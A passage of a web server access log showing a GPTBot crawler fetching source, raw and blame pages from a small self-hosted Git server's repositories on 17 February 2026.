+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:14:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 210994] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211029] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:10:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" +[17/Feb/2026:14:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 12475] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" +[17/Feb/2026:14:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 12475] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" +[17/Feb/2026:14:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 12473] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" +[17/Feb/2026:14:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10464] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" +[17/Feb/2026:14:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels" [Client 74.7.227.38] [Length 7626] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:14:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11236] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10190] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10220] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322704] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 11014] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" +[17/Feb/2026:14:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 11041] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" +[17/Feb/2026:14:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 12769] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:14:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10681] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10992] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 148058] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10170] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" +[17/Feb/2026:14:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:14:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10331] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" +[17/Feb/2026:14:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" [Client 74.7.227.38] [Length 10793] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:14:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9923] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" +[17/Feb/2026:14:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" +[17/Feb/2026:14:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 9965] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" +[17/Feb/2026:14:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" +[17/Feb/2026:14:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" +[17/Feb/2026:14:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 11800] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" +[17/Feb/2026:14:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" +[17/Feb/2026:14:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:14:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 11705] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:14:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23925] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10514] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" [Client 74.7.227.38] [Length 10710] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13294] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:14:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 115951] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:14:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 288809] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" +[17/Feb/2026:14:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10720] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:14:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fassets" [Client 74.7.227.38] [Length 18593] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 10982] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" +[17/Feb/2026:14:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] 